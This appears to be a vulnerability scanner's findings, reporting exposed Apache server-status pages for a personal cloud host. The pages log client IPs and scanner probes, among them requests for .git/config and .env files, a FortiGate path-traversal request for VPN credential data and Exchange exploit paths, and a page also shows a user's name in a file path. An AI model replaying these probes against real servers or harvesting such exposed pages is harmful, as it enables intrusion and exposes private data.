(open/recv/resp/push/rst) 1-323457871/40/1333W 10.06003253300.05.85564.66 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-323457871/40/1237W 11.52008397350.024.98739.24 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-323457871/40/1230W 15.26004914170.09.40632.00 185.3.94.183http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-323457871/40/1306W 15.17004794580.06.31518.01 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-323457870/40/1348_ 15.211028603427990.014.65660.89 124.156.219.253h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-323457870/40/1284_ 15.301028514115020.08.74563.81 124.156.219.253http/1.1 1-323457870/42/1263_ 15.41824417039850.06.16610.66 141.255.166.2http/1.1localhost:80GET / HTTP/1.1 1-323457870/40/1297_ 15.4221313446747900.08.57697.59 172.105.89.161http/1.1localhost:80\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf 1-323457870/42/1288_ 15.211112204707500.012.38627.89 192.241.204.38http/1.1 1-323457870/41/1252_ 15.30788416566190.05.82636.04 45.227.254.19http/1.1 1-323457870/44/1231_ 15.30941906173570.014.60736.53 128.14.209.146http/1.1 1-323457870/42/1253_ 15.31448313671180.08.581198.33 213.14.141.242http/1.1 1-323457870/39/1248_ 13.581028423733420360.013.98717.22 124.156.219.253h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-323457870/41/1300_ 14.788239242212025020.015.64723.36 104.152.52.219http/1.1 1-323457870/40/1257_ 14.42823921723748830.014.36950.31 104.152.52.219http/1.1 1-323457870/38/1271_ 15.16213146554651350.014.56572.34 178.62.214.217h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-323457870/42/1218_ 15.31230804019340.010.12899.14 172.105.89.161http/1.1 1-323457870/40/1357R 10.09128432734588410.06.881064.94 185.3.94.183http/1.1 1-323457870/37/1284_ 10.0523395037870.09.00606.80 185.3.94.183http/1.1 1-323457870/42/1187R 15.3712843993141070.09.30569.06 185.3.94.183http/1.1 2-30-0/0/573. 0.001705767082429910.00.00354.78 104.156.155.16http/1.1 2-30-0/0/588. 0.001705766433722390.00.00545.46 104.156.155.16http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb64f42715
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Tuesday, 15-Nov-2022 08:43:05 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 18 days 17 hours 27 minutes 43 seconds Server load: 0.05 0.11 0.09 Total accesses: 53556 - Total Traffic: 28.5 GB - Total Duration: 13810239 CPU Usage: u59 s98.3 cu1225.81 cs356.79 - .108% CPU load .0331 requests/sec - 18.5 kB/second - 0.5 MB/request - 257.865 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 2216954no0yes1015000 3216955no0yes124000 Sum200 1139000 ..................................................W___W___W_WWWW WWW____________________W____________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-17-0/0/760. 0.0046338021837880.00.00406.26 139.162.229.202http/1.1localhost:80GET / HTTP/1.0 0-17-0/0/733. 0.004633807151919060.00.00518.53 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /admin.cgi HTTP/1.1 0-17-0/0/835. 0.0046338002058900.00.00408.00 139.162.229.202http/1.1localhost:80GET /docs/cplugError.html/ HTTP/1.1 0-17-0/0/753. 0.0046338001894360.00.00550.30 139.162.229.202http/1.1localhost:80GET /pools/default/buckets HTTP/1.1 0-17-0/0/769. 0.004633803201814440.00.00483.46 139.162.229.202http/1.1 0-17-0/0/835. 0.004633801692100090.00.00419.60 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-17-0/0/767. 0.0046338001768610.00.00370.48 139.162.229.202http/1.1localhost:80GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1 0-17-0/0/747. 0.0046338011928550.00.00580.02 179.60.149.55http/1.1localhost:80\x03 0-17-0/0/761. 0.004633807061703890.00.00350.29 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /nmaplowercheck1668036569 HTTP/1.1 0-17-0/0/763. 0.004633802011921880.00.00649.15 139.162.229.202http/1.1 0-17-0/0/774. 0.00463380652027910.00.00566.14 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-17-0/0/757. 0.004633806701868060.00.00653.36 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /Portal0000.htm HTTP/1.1 0-17-0/0/790. 0.00463380632263160.00.00382.77 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /localstart.jhtml HTTP/1.1 0-17-0/0/747. 0.004633801271815100.00.00443.73 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /base.jsp HTTP/1.1 0-17-0/0/782. 0.00463380821962470.00.00427.71 146.190.64.246http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-17-0/0/773. 0.004633805241945680.00.00433.38 139.162.229.202http/1.1 0-17-0/0/828. 0.0046338002229200.00.00423.72 139.162.229.202http/1.1 0-17-0/0/755. 0.00463380561747100.00.00386.78 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /HNAP1 HTTP/1.1 0-17-0/0/756. 0.0046338021937230.00.00565.19 165.227.147.68http/1.1localhost:80GET / HTTP/1.1 0-17-0/0/735. 0.00463380571852940.00.00460.26 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-17-0/0/754. 0.004633807151988750.00.00405.62 139.162.229.202http/1.1localhost:80\x16\x03\x01\x02 0-17-0/0/760. 0.0046338001759650.00.00402.95 165.227.147.68http/1.1 0-17-0/0/758. 0.004633804131886960.00.00522.58 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-17-0/0/741. 0.004633804731870710.00.00559.64 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-17-0/0/761. 0.00463380681805480.00.00439.54 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /home.shtml HTTP/1.1 1-17-0/0/1055. 0.0046338002894620.00.001044.55 139.162.229.202http/1.1 1-17-0/0/1024. 0.0046338002438730.00.00610.07 139.162.229.202http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-17-0/0/1015. 0.004633801362676600.00.00499.78 139.162.229.202http/1.1 1-17-0/0/1046. 0.0046338012792620.00.00594.42 139.162.229.202http/1.1 1-17-0/0/1016. 0.004633801303204870.00.001521.78 165.227.147.68http/1.1 1-17-0/0/1090. 0.004633802252666860.00.00540.02 185.7.214.218http/1.1ravignon.mycloud.paris:443GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn 1-17-0/0/1011. 0.0046338002681070.00.00668.46 139.162.229.202http/1.1 1-17-0/0/1011. 0.004633801542758670.00.00579.97 139.162.229.202http/1.1 1-17-0/0/1097. 0.004633801793671080.00.00465.28 139.162.229.202http/1.1 1-17-0/0/1139. 0.004633801412874450.00.00610.91 139.162.229.202http/1.1 1-17-0/0/1067. 0.004633801262531620.00.00446.16 165.227.147.68http/1.1localhost:80\x16\x03\x01 1-17-0/0/1033. 0.0046338002939190.00.00545.14 139.162.229.202http/1.1 1-17-0/0/1084. 0.004633807473020450.00.00623.20 139.162.229.202http/1.1 1-17-0/0/1062. 0.004633801392681450.00.00561.69 139.162.229.202http/1.1 1-17-0/0/1031. 0.0046338002876970.00.00562.67 139.162.229.202http/1.1 1-17-0/0/1000. 0.004633802382584120.00.00623.07 139.162.229.202http/1.1 1-17-0/0/1048. 0.004633805743073680.00.001160.24 139.162.229.202http/1.1 1-17-0/0/1043. 0.0046338022796120.00.00675.72 139.162.229.202http/1.1 1-17-0/0/1053. 0.00463380742706190.00.00611.99 146.190.64.246http/1.1ravignon.mycloud.paris:443GET /stalker_portal/c/version.js HTTP/1.1 1-17-0/0/1057. 0.004633801662961560.00.00889.82 139.162.229.202http/1.1 1-17-0/0/1048. 0.004633801272593440.00.00516.45 139.162.229.202http/1.1ravignon.mycloud.paris:443GET /base.inc HTTP/1.1 1-17-0/0/1017. 0.004633801352628750.00.00842.21 139.162.229.202http/1.1 1-17-0/0/1023. 0.0046338002868750.00.00980.27 165.227.147.68http/1.1localhost:80\x16\x03\x01 1-17-0/0/1073. 0.00463380533336730.00.00535.55 165.227.147.68http/1.1 1-17-0/0/978. 0.004633801812522240.00.00528.63 165.227.147.68http/1.1 2-232169541/14/184W 6.9200314950.00.161.44 172.104.249.218http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 2-232169540/14/176_ 7.110162325970.00.041.29 172.104.249.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-232169540/53/214_ 6.990168504140.03.404.75 172.104.249.218http/1.1 2-23
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbf1f83181
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Friday, 04-Nov-2022 05:28:05 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 13 Parent Server MPM Generation: 12 Server uptime: 7 days 14 hours 12 minutes 43 seconds Server load: 0.00 0.00 0.00 Total accesses: 35071 - Total Traffic: 28.3 GB - Total Duration: 10115631 CPU Usage: u20.56 s37.35 cu1111.07 cs324.6 - .228% CPU load .0535 requests/sec - 45.3 kB/second - 0.8 MB/request - 288.433 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 047209no0yes322000 147210no0yes916000 Sum200 1238000 _____R_________WR_________R______RR__RRRR__R___R__.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-12472090/2/553_ 0.203548521492260.00.02405.13 221.157.133.93http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-12472090/0/543_ 0.0043761081592860.00.00517.41 35.216.204.3http/1.1 0-12472090/0/615_ 0.004376551617890.00.00406.67 35.216.204.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/0/542_ 0.0043762431594550.00.00549.15 31.220.1.83http/1.1 0-12472090/1/560_ 0.01337701504040.00.00482.34 192.241.196.145h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/2/638R 0.1157071581819270.00.03418.46 162.221.192.26http/1.1ravignon.mycloud.paris:443GET /owa/ HTTP/1.1 0-12472090/1/571_ 0.01337811503500.00.01369.18 192.241.196.145h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/1/551_ 0.06337701615230.00.00578.91 192.241.196.145http/1.1 0-12472090/1/535_ 0.06337601352640.00.00349.05 192.241.196.145h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/1/559_ 0.01337601633490.00.00647.95 192.241.196.145http/1.1 0-12472090/1/563_ 0.243332771696010.00.02564.78 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-12472090/2/539_ 0.0833321941539200.00.02652.09 183.136.225.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-12472090/1/583_ 0.251165901780740.00.02381.47 35.195.93.98http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-12472090/2/555_ 0.09116511492470.00.02442.55 183.136.225.32http/1.1ravignon.mycloud.paris:443GET /robots.txt HTTP/1.1 0-12472090/1/560_ 0.257161081509880.00.00426.47 183.104.65.184http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-12472091/0/568W 0.00001589320.00.00432.19 139.59.6.30http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-12472090/2/624R 0.12437611846370.00.01422.54 35.216.204.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-12472090/1/572_ 0.02437601491910.00.01385.75 35.216.204.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/0/553_ 0.004376841637620.00.00564.00 35.216.204.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/0/539_ 0.004376671540120.00.00459.13 35.216.204.3http/1.1 0-12472090/1/546_ 0.044376811567890.00.02404.38 35.216.204.3http/1.1 0-12472090/1/559_ 0.04437601452570.00.01401.82 35.216.204.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12472090/0/565_ 0.004376891579650.00.00521.42 35.216.204.3http/1.1 0-12472090/2/555_ 0.19384211574360.00.02558.48 74.82.47.57http/1.1localhost:80GET / HTTP/1.1 0-12472090/0/562_ 0.00384211499460.00.00438.33 74.82.47.57http/1.1 1-12472100/0/795_ 0.003377742495270.00.001042.93 192.241.196.145http/1.1 1-12472101/0/765W 0.00002063890.00.00608.63 139.59.6.30http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-12472100/2/753_ 0.10312120820.00.03498.17 139.59.6.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/0/783_ 0.003702422570.00.00592.84 206.189.124.174http/1.1 1-12472100/2/751_ 0.1741872781140.00.021520.32 139.59.6.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-12472100/0/812_ 0.003692233070.00.00538.44 139.59.6.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/0/753_ 0.0022462294460.00.00667.02 139.59.6.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/2/759_ 0.10202356950.00.00578.61 139.59.6.30http/1.1 1-12472100/0/837R 0.0035971533297090.00.00463.79 74.82.47.9http/1.1 1-12472100/2/875R 0.13338312508000.00.02609.41 80.94.92.239http/1.1localhost:80GET / HTTP/1.1 1-12472100/1/793_ 0.1012192046030.00.00444.69 139.59.6.30http/1.1 1-12472100/2/785_ 0.153278712572380.00.01543.56 193.106.29.122http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-12472100/1/820R 0.07337812575920.00.01621.67 94.102.61.8http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 1-12472100/0/793R 0.0033782592245020.00.00560.20 192.241.196.145h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/0/763R 0.003378732288440.00.00561.25 94.102.61.8http/1.1 1-12472100/1/748R 0.083378772220410.00.02621.73 192.241.196.145http/1.1 1-12472100/0/777_ 0.00202661190.00.001158.81 139.59.6.30http/1.1 1-12472100/0/783_ 0.001652430190.00.00674.25 139.59.6.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/0/788R 0.003378972288580.00.00610.46 192.241.196.145h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/1/796_ 0.04132533820.00.00888.40 139.59.6.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12472100/0/778_ 0.0001732190150.00.00514.91 139.59.6.30http/1.1 1-12472100/2/758_ 0.1301852251570.00.02840.83 139.59.6.30http/1.1 1-12472100/2/759R 0.13359702522990.00.02978.73 74.82.47.9http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-12472100/0/822_ 0.003278952922420.00.00534.21 68.66.164.26http/1.1 1-12472100/0/744_ 0.0033762482207800.00.00527.30 192.241.196.145http/1.1 2-8-0/0/27. 0.0027860408430.00.000.22 172.104.137.47http/1.1 2-8-0/0/21. 0.0027860406940.00.000.08 172.104.137.47http/1.1 2-8-0/0/23. 0.0027860404630.00.000.12 172.104.137.47http/1.1
The server-status page (usually /server-status
) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48051d0d8ddc
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 30-Oct-2024 17:01:51 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 344 Parent Server MPM Generation: 343 Server uptime: 341 days 10 hours 2 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 581498 - Total Traffic: 62.2 GB - Total Duration: 80513891 CPU Usage: u977.74 s1918.27 cu6161.19 cs1731.44 - .0366% CPU load .0197 requests/sec - 2265 B/second - 112.2 kB/request - 138.459 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02712100no0yes124000 12712101no0yes025000 Sum200 149000 __________W_______________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34327121000/19/6039_ 3.3201459067750.00.18110.88 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-34327121000/14/5974_ 2.85108423320.00.1988.01 194.195.215.162http/1.1 0-34327121000/17/6096_ 3.1002148788580.00.2898.76 162.19.236.43http/1.1 0-34327121000/14/5985_ 3.07018689320.00.21102.92 162.19.236.43http/1.1localhost:80POST / HTTP/1.1 0-34327121000/17/6081_ 3.06108877240.00.14109.42 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 0-34327121000/12/6091_ 3.1412539048120.00.14128.22 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/15/6081_ 3.0612578701430.00.1577.86 142.93.129.190http/1.1 0-34327121000/14/6013_ 3.16148647370.00.18100.27 142.93.129.190http/1.1 0-34327121000/13/5973_ 3.12108825670.00.1092.09 142.93.129.190http/1.1 0-34327121000/16/6071_ 2.97139241740.00.23174.92 142.93.129.190http/1.1 0-34327121001/12/6038W 3.19008680220.00.1281.32 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-34327121000/17/5995_ 2.8585208681500.00.1773.06 199.45.154.124http/1.1 0-34327121000/15/6076_ 2.95119158600.00.1696.53 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/12/6041_ 2.96128898000.00.0986.49 142.93.129.190http/1.1 0-34327121000/17/6073_ 3.2112458854120.00.2159.23 142.93.129.190http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34327121000/20/6123_ 3.3201589292510.00.2197.85 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-34327121000/16/6050_ 3.12118979200.00.18134.21 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/14/5974_ 3.07008771610.00.20118.32 162.19.236.43http/1.1localhost:80GET /.env HTTP/1.1 0-34327121000/9/6004_ 3.11108507940.00.1594.39 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/12/5935_ 2.9985208948110.00.1990.32 199.45.154.124http/1.1 0-34327121000/17/5965_ 3.3111768459090.00.1966.50 142.93.129.190http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34327121000/19/5967_ 3.3301808920030.00.1772.28 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-34327121000/16/5882_ 2.88108439490.00.1379.91 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/18/5983_ 3.3401468889370.00.2093.59 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-34327121000/12/5972_ 3.0902828935210.00.16130.87 162.19.236.43http/1.1 1-34327121010/6/8703_ 0.86171819987380.00.051828.57 202.112.47.208http/1.1 1-34327121010/3/8563_ 0.893778010195580.00.031181.50 199.45.154.124http/1.1 1-34327121010/4/7523_ 0.86378119533050.00.071544.17 199.45.154.124http/1.1 1-34327121010/4/8274_ 0.86133009885630.00.051705.63 78.153.140.177http/1.1 1-34327121010/3/7590_ 0.8931009996640.00.031292.72 193.174.89.19http/1.1 1-34327121010/6/9574_ 1.05117110081560.00.041501.73 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-34327121010/3/7855_ 0.6350772419791790.00.051652.06 78.153.140.177http/1.1 1-34327121010/6/10070_ 0.985077010014520.00.041825.41 104.236.88.84http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-34327121010/4/8048_ 0.86379109710180.00.071352.93 78.153.140.177http/1.1 1-34327121010/4/8499_ 0.883785010132270.00.041692.11 199.45.154.124h2ravignon.mycloud.paris:443[0/0] init 1-34327121010/6/8530_ 0.9837911169535680.00.041960.34 199.45.154.124http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-34327121010/4/8039_ 0.883785310101300.00.054065.26 199.45.154.124h2ravignon.mycloud.paris:443[0/0] done 1-34327121010/4/7695_ 0.90111110045880.00.072092.06 186.22.11.78http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-34327121010/4/9433_ 0.9202619747680.00.041623.96 8.211.42.174http/1.1ravignon.mycloud.paris:443GET /dns-query?dns=7I4BAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/ 1-34327121010/3/7416_ 0.7393572639914560.00.041163.87 194.195.215.162http/1.1 1-34327121010/5/8230_ 0.881155209838600.00.031369.23 78.153.140.177http/1.1localhost:80GET /.env.testing HTTP/1.1 1-34327121010/1/8311_ 0.199354310169380.00.001843.28 194.195.215.162http/1.1 1-34327121010/6/7351_ 1.0313302149648160.00.102009.32 47.253.92.249http/1.1ravignon.mycloud.paris:443POST /dns-query HTTP/1.1 1-34327121010/5/7768_ 0.98521329542810.00.042349.54 80.82.77.202http/1.1localhost:80GET / HTTP/1.0 1-34327121010/4/7433_ 0.863785112696810.00.041967.18 78.153.140.177http/1.1 1-34327121010/5/8370_ 0.87982609770380.00.071902.63 78.153.140.177http/1.1localhost:80GET /.env.save HTTP/1.1 1-34327121010/3/7444_ 0.285816939961230.00.043158.42 35.156.208.104http/1.1 1-34327121010/6/7675_ 0.88581609930060.00.063645.80 35.156.208.104http/1.1 1-34327121010/6/7649_ 1.06017410167910.00.071236.79 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-34327121010/2/7426_ 0.6052131899629130.00.091608.20 78.153.140.177http/1.1 2-330-0/0/2604. 0.0010981101963429060.00.0051.60 143.244.139.14http/1.1 2-330-0/0/2568. 0.00109811003606420.00.00195.93 169.228.66.212http/1.1 2-330
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805c92b3110
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 26-Oct-2024 13:20:16 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 340 Parent Server MPM Generation: 339 Server uptime: 337 days 6 hours 20 minutes 36 seconds Server load: 0.08 0.02 0.01 Total accesses: 578549 - Total Traffic: 62.2 GB - Total Duration: 80423940 CPU Usage: u963.97 s1893.53 cu6144.31 cs1724.49 - .0368% CPU load .0199 requests/sec - 2292 B/second - 112.8 kB/request - 139.01 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02695105no0yes124000 12695106no0yes025000 Sum200 149000 __________________W_______________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33926951050/3/5994_ 0.50128319049260.00.01110.61 45.137.126.25http/1.1localhost:80POST / HTTP/1.1 0-33926951050/3/5932_ 0.4892302478410750.00.0287.72 4.255.101.233http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-33926951050/2/6048_ 0.49397338754460.00.0095.46 91.191.209.206http/1.1localhost:80\x03 0-33926951050/2/5943_ 0.26397208668780.00.00102.60 40.118.214.190http/1.1 0-33926951050/1/6038_ 0.26922908864330.00.00109.19 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-33926951050/2/6054_ 0.49302719031520.00.00127.96 179.60.147.13http/1.1localhost:80\x03 0-33926951050/2/6037_ 0.26302708682350.00.0077.60 193.177.162.132http/1.1localhost:80GET /laravel/.env HTTP/1.1 0-33926951050/2/5971_ 0.36574638636790.00.01100.00 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-33926951050/4/5929_ 0.5401888811160.00.0191.82 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33926951050/2/6012_ 0.27128309219190.00.02174.48 45.137.126.25http/1.1 0-33926951050/3/5996_ 0.5222528666840.00.0281.08 139.59.136.184http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33926951050/4/5954_ 0.50111608667610.00.0172.75 185.16.38.232http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-33926951050/1/6027_ 0.2311112599144480.00.0296.27 185.242.226.117h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33926951050/3/5997_ 0.31248890950.00.0286.33 106.227.49.113http/1.1localhost:80GET / HTTP/1.1 0-33926951050/2/6030_ 0.42108839610.00.0158.94 139.59.136.184http/1.1 0-33926951050/3/6077_ 0.5401419275800.00.0097.52 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-33926951050/2/6008_ 0.24008965640.00.00133.97 51.159.234.118http/1.1 0-33926951050/1/5932_ 0.25008763620.00.00118.00 193.177.162.132http/1.1localhost:80GET /new/.env.staging HTTP/1.1 0-33926951051/3/5960W 0.32008490910.00.0294.08 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-33926951050/3/5894_ 0.49574608933590.00.0090.01 172.169.2.246http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33926951050/2/5926_ 0.431522358441770.00.0066.25 74.82.47.3http/1.1localhost:80\x16\x03\x01 0-33926951050/2/5921_ 0.271522308900130.00.0071.96 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-33926951050/1/5835_ 0.261522308430220.00.0079.68 193.177.162.132http/1.1localhost:80GET /_profiler/phpinfo HTTP/1.1 0-33926951050/5/5936_ 0.46138622848869000.00.0293.28 4.151.218.216http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33926951050/2/5936_ 0.261386208913360.00.01130.57 193.177.162.132http/1.1localhost:80GET /_profiler/phpinfo/info.php HTTP/1.1 1-33926951060/7/8621_ 1.68119975110.00.031828.24 139.59.136.184h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33926951060/5/8507_ 0.611110178040.00.011181.22 139.59.136.184h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33926951060/6/7459_ 1.556832599519380.00.031543.83 162.19.236.43http/1.1 1-33926951060/6/8184_ 1.66128439864970.00.021705.23 45.137.126.24http/1.1 1-33926951060/12/7504_ 1.74128439969370.00.041292.39 45.137.126.24http/1.1localhost:80POST / HTTP/1.1 1-33926951060/4/9499_ 1.74703210058620.00.021501.33 165.232.130.69http/1.1localhost:80GET / HTTP/1.0 1-33926951060/10/7776_ 1.68119767760.00.031651.76 139.59.136.184http/1.1 1-33926951060/11/9988_ 1.68229995150.00.051825.03 139.59.136.184h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33926951060/10/7983_ 1.8311699689330.00.041352.58 139.59.136.184http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33926951060/4/8431_ 1.561310113530.00.021691.75 139.59.136.184http/1.1 1-33926951060/5/8452_ 1.68119510020.00.061959.95 